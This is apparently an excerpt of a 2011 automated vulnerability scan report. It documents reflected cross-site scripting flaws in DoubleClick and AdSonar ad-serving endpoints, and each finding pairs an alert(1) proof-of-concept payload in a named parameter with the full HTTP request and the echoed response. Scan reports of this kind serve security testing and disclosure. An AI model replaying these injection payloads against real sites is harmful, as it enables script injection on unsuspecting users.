Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS81NDM5Mzc1MTA2NjM4MDM3OS8xMDk2NjQvMTAyMTY4LzQvcUNrUlV0a2tSODZTZllSNWtDMUZwcG5NelEyY2tlaWdSdTZMeEpRUzkyRS8/MpDSwvg5GdsMNZTleYApVCKa2Fo&price=TY1DWwAGmFoK5X_Ef7dLZSWZTQqUNqdlAdKhdw&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOV_6W0ONTdqwGsT_lQfllt39B9zvj_EB5PW9vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFKaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLytOU0ZUVys_b3JkZXJpbmc9JnNlYXJjaHBocmFzZT1hbGyYAtQWwAIEyALWwYwOqAMB6APLA_UDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtx9q6AzNXuiMRPfKd7knjv7C82atQ%26client%3Dca-pub-5812731941170583%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6999
Date: Sat, 26 Mar 2011 01:38:11 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 01:38:11 GMT
Cache-Control: private, x-gzip-ok=""

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
tp://ad.doubleclick.net/click%3Bh%3Dv8/3ad6/f/a6/%2a/k%3B235630582%3B0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=543937510663803792bec3'-alert(1)-'b3534d6f54d&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3D
...[SNIP]...

5.22. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7ede"-alert(1)-"78d948007db was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=54393751066380379e7ede"-alert(1)-"78d948007db&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=54393751066380379? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS81NDM5Mzc1MTA2NjM4MDM3OS8xMDk2NjQvMTAyMTY4LzQvcUNrUlV0a2tSODZTZllSNWtDMUZwcG5NelEyY2tlaWdSdTZMeEpRUzkyRS8/MpDSwvg5GdsMNZTleYApVCKa2Fo&price=TY1DWwAGmFoK5X_Ef7dLZSWZTQqUNqdlAdKhdw&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOV_6W0ONTdqwGsT_lQfllt39B9zvj_EB5PW9vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFKaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLytOU0ZUVys_b3JkZXJpbmc9JnNlYXJjaHBocmFzZT1hbGyYAtQWwAIEyALWwYwOqAMB6APLA_UDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtx9q6AzNXuiMRPfKd7knjv7C82atQ%26client%3Dca-pub-5812731941170583%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6999
Date: Sat, 26 Mar 2011 01:38:07 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 01:38:07 GMT
Cache-Control: private, x-gzip-ok=""

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
tp://ad.doubleclick.net/click%3Bh%3Dv8/3ad6/f/a6/%2a/k%3B235630582%3B0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=54393751066380379e7ede"-alert(1)-"78d948007db&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3D
...[SNIP]...

5.23. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.43 [mt_adid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.43

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26d19'-alert(1)-'06d1516c0ac was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.mediamath/B5123370.43;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60843514997508161&mt_id=109132&mt_adid=7026d19'-alert(1)-'06d1516c0ac&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=60843514997508161? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS82MDg0MzUxNDk5NzUwODE2MS8xMDkxMzIvMTAyMDY1LzQvUWk0TlZFWk5SbHYyNzBhYklEZU9pek92X2JTNTJmTDMyQ3J1UW04QjBmWS8/ooeD-k-gx-6pGhT2kZ6UUsZVX08&price=TY1DQQAHHIgK5XGJfLlnh8zvfrJf91e2Op9Oyg&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBmMoTQUONTYi5HInjlQeHz-XlB9zvj_EB5PW9vBGErMGhDwAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFMaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLycrTlNGVFcrJz9vcmRlcmluZz0mc2VhcmNocGhyYXNlPWFsbJgCsBjAAgTIAtbBjA6oAwHoA8sD6AP0CPUDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtyFJMD7LgLXSPFUBmEVhmb0cBGe0Q%26client%3Dca-pub-5812731941170583%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 670
Date: Sat, 26 Mar 2011 01:37:49 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 01:37:49 GMT
Cache-Control: private, x-gzip-ok=""

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ad6/c/a6/%2a/c;235638519;0-0;0;59396967;3454-728/90;40463950/40481737/1;;~sscs=%3fhttp://pixel.mathtag.com/click/img?mt_aid=60843514997508161&mt_id=109132&mt_adid=7026d19'-alert(1)-'06d1516c0ac&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUSMK2%26selleracctnb
...[SNIP]...

5.24. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.43 [mt_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.43

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ac00'-alert(1)-'fb3b0cd2a48 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.mediamath/B5123370.43;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60843514997508161&mt_id=1091329ac00'-alert(1)-'fb3b0cd2a48&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=60843514997508161? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS82MDg0MzUxNDk5NzUwODE2MS8xMDkxMzIvMTAyMDY1LzQvUWk0TlZFWk5SbHYyNzBhYklEZU9pek92X2JTNTJmTDMyQ3J1UW04QjBmWS8/ooeD-k-gx-6pGhT2kZ6UUsZVX08&price=TY1DQQAHHIgK5XGJfLlnh8zvfrJf91e2Op9Oyg&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBmMoTQUONTYi5HInjlQeHz-XlB9zvj_EB5PW9vBGErMGhDwAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFMaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLycrTlNGVFcrJz9vcmRlcmluZz0mc2VhcmNocGhyYXNlPWFsbJgCsBjAAgTIAtbBjA6oAwHoA8sD6AP0CPUDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtyFJMD7LgLXSPFUBmEVhmb0cBGe0Q%26client%3Dca-pub-5812731941170583%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 670
Date: Sat, 26 Mar 2011 01:37:45 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 01:37:45 GMT
Cache-Control: private, x-gzip-ok=""

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ad6/c/a6/%2a/c;235638519;0-0;0;59396967;3454-728/90;40463950/40481737/1;;~sscs=%3fhttp://pixel.mathtag.com/click/img?mt_aid=60843514997508161&mt_id=1091329ac00'-alert(1)-'fb3b0cd2a48&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUSMK2%26s
...[SNIP]...

5.25. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.43 [mt_uuid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.43

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a78e'-alert(1)-'f8fecf152f0 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.mediamath/B5123370.43;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60843514997508161&mt_id=109132&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b8a78e'-alert(1)-'f8fecf152f0&redirect=;ord=60843514997508161? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS82MDg0MzUxNDk5NzUwODE2MS8xMDkxMzIvMTAyMDY1LzQvUWk0TlZFWk5SbHYyNzBhYklEZU9pek92X2JTNTJmTDMyQ3J1UW04QjBmWS8/ooeD-k-gx-6pGhT2kZ6UUsZVX08&price=TY1DQQAHHIgK5XGJfLlnh8zvfrJf91e2Op9Oyg&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBmMoTQUONTYi5HInjlQeHz-XlB9zvj_EB5PW9vBGErMGhDwAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFMaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLycrTlNGVFcrJz9vcmRlcmluZz0mc2VhcmNocGhyYXNlPWFsbJgCsBjAAgTIAtbBjA6oAwHoA8sD6AP0CPUDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtyFJMD7LgLXSPFUBmEVhmb0cBGe0Q%26client%3Dca-pub-5812731941170583%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 670
Date: Sat, 26 Mar 2011 01:37:53 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 01:37:53 GMT
Cache-Control: private, x-gzip-ok=""

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ad6/c/a6/%2a/c;235638519;0-0;0;59396967;3454-728/90;40463950/40481737/1;;~sscs=%3fhttp://pixel.mathtag.com/click/img?mt_aid=60843514997508161&mt_id=109132&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b8a78e'-alert(1)-'f8fecf152f0&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUSMK2%26selleracctnbr%3D6430098999I%26cc%3DUS%26producttypecd%3DI
...[SNIP]...

5.26. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.43 [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.43

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f615'-alert(1)-'c0e60859184 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.mediamath/B5123370.43;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60843514997508161&mt_id=109132&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=8f615'-alert(1)-'c0e60859184 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS82MDg0MzUxNDk5NzUwODE2MS8xMDkxMzIvMTAyMDY1LzQvUWk0TlZFWk5SbHYyNzBhYklEZU9pek92X2JTNTJmTDMyQ3J1UW04QjBmWS8/ooeD-k-gx-6pGhT2kZ6UUsZVX08&price=TY1DQQAHHIgK5XGJfLlnh8zvfrJf91e2Op9Oyg&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBmMoTQUONTYi5HInjlQeHz-XlB9zvj_EB5PW9vBGErMGhDwAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFMaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLycrTlNGVFcrJz9vcmRlcmluZz0mc2VhcmNocGhyYXNlPWFsbJgCsBjAAgTIAtbBjA6oAwHoA8sD6AP0CPUDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtyFJMD7LgLXSPFUBmEVhmb0cBGe0Q%26client%3Dca-pub-5812731941170583%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 670
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 26 Mar 2011 01:37:58 GMT
Expires: Sat, 26 Mar 2011 01:37:58 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ad6/c/a6/%2a/c;235638519;0-0;0;59396967;3454-728/90;40463950/40481737/1;;~sscs=%3fhttp://pixel.mathtag.com/click/img?mt_aid=60843514997508161&mt_id=109132&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=8f615'-alert(1)-'c0e60859184https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUSMK2%26selleracctnbr%3D6430098999I%26cc%3DUS%26producttypecd%3DIP%26source
...[SNIP]...

5.27. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.43 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.43

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da786'-alert(1)-'98c2520a2a5 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.mediamath/B5123370.43;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60843514997508161da786'-alert(1)-'98c2520a2a5&mt_id=109132&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=60843514997508161? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS82MDg0MzUxNDk5NzUwODE2MS8xMDkxMzIvMTAyMDY1LzQvUWk0TlZFWk5SbHYyNzBhYklEZU9pek92X2JTNTJmTDMyQ3J1UW04QjBmWS8/ooeD-k-gx-6pGhT2kZ6UUsZVX08&price=TY1DQQAHHIgK5XGJfLlnh8zvfrJf91e2Op9Oyg&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBmMoTQUONTYi5HInjlQeHz-XlB9zvj_EB5PW9vBGErMGhDwAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFMaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLycrTlNGVFcrJz9vcmRlcmluZz0mc2VhcmNocGhyYXNlPWFsbJgCsBjAAgTIAtbBjA6oAwHoA8sD6AP0CPUDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtyFJMD7LgLXSPFUBmEVhmb0cBGe0Q%26client%3Dca-pub-5812731941170583%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 670
Date: Sat, 26 Mar 2011 01:37:41 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 01:37:41 GMT
Cache-Control: private, x-gzip-ok=""

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ad6/c/a6/%2a/c;235638519;0-0;0;59396967;3454-728/90;40463950/40481737/1;;~sscs=%3fhttp://pixel.mathtag.com/click/img?mt_aid=60843514997508161da786'-alert(1)-'98c2520a2a5&mt_id=109132&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3D
...[SNIP]...

5.28. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 48579<script>alert(1)</script>8f27a3ba150 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=1515622&placementId=1515625&pid=225976848579<script>alert(1)</script>8f27a3ba150&ps=-1&zw=580&zh=90&url=http%3A//www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html&v=5&dct=Geraldine%20Ferraro%20Dead%3A%20First%20Female%20Vice%20Presidential%20Candidate%20Dies%20At%2075&metakw=geraldine,ferraro,dead%3A,first,female,vice,presidential,candidate,dies,at,75,politics HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16lsqii1n1a3cr; TData=99999%7C61674%7C60489%7C60740%7C60490%7C56262%7C61576%7C60493%7C50963%7C60491%7C60515%7C50455%7C60514%7C53656%7C56830%7C52615%7C60546%7C56918%7C60500%7C56920%7C56930%7C56555%7C53435%7C51133%7C56917%7C56780%7C56500%7C52611%7C54463%7C56969%7C56835%7C54938%7C56761%7C56768%7C54173%7C53603_Wed%2C%2023%20Mar%202011%2019%3A39%3A43%20GMT

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:55 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2507


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
